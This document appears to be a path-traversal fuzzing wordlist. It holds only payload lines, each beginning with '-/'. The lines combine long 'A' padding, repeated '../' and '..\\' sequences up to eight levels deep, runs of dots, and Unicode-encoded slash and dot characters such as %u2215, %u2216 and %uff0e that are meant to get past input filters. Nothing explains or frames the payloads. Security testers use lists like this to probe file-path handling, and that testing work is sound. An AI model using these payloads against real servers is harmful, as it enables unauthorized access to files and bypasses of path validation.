-/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\ -/.../ -/.../.../ -/.../.../.../ -/.../.../.../.../ -/.../.../.../.../.../ -/.../.../.../.../.../.../ -/.../.../.../.../.../.../.../ -/.../.../.../.../.../.../.../.../ -/...\ -/...\...\ -/...\...\...\ -/...\...\...\...\ -/...\...\...\...\...\ -/...\...\...\...\...\...\ -/...\...\...\...\...\...\...\ -/...\...\...\...\...\...\...\...\ -/..../ -/..../..../ -/..../..../..../ -/..../..../..../..../ -/..../..../..../..../..../ -/..../..../..../..../..../..../ -/..../..../..../..../..../..../..../ -/..../..../..../..../..../..../..../..../ -/....\ -/....\....\ -/....\....\....\ -/....\....\....\....\ -/....\....\....\....\....\ -/....\....\....\....\....\....\ -/....\....\....\....\....\....\....\ -/....\....\....\....\....\....\....\....\ -/........................................................................../ -/........................................................................../../ -/........................................................................../../../ -/........................................................................../../../../ -/........................................................................../../../../../ -/........................................................................../../../../../../ -/........................................................................../../../../../../../ -/........................................................................../../../../../../../../ -/..........................................................................\ -/..........................................................................\..\ -/..........................................................................\..\..\ -/..........................................................................\..\..\..\ -/..........................................................................\..\..\..\..\ -/..........................................................................\..\..\..\..\..\ -/..........................................................................\..\..\..\..\..\..\ -/..........................................................................\..\..\..\..\..\..\..\ -/..%u2215 -/..%u2215..%u2215 -/..%u2215..%u2215..%u2215 -/..%u2215..%u2215..%u2215..%u2215 -/..%u2215..%u2215..%u2215..%u2215..%u2215 -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215 -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215 -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215 -/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ -/%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 -/..%u2216 -/..%u2216..%u2216 -/..%u2216..%u2216..%u2216 -/..%u2216..%u2216..%u2216..%u2216 -/..%u2216..%u2216..%u2216..%u2216..%u2216 -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216 -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216 -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216 -/..%uEFC8 -/..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8 -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8 -/..%uF025 -/..%uF025..%uF025 -/..%uF025..%uF025..%uF025 -/..%uF025..%uF025..%uF025..%uF025 -/..%uF025..%uF025..%uF025..%uF025..%uF025 -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025 -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025 -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025 -/%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\ -/%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 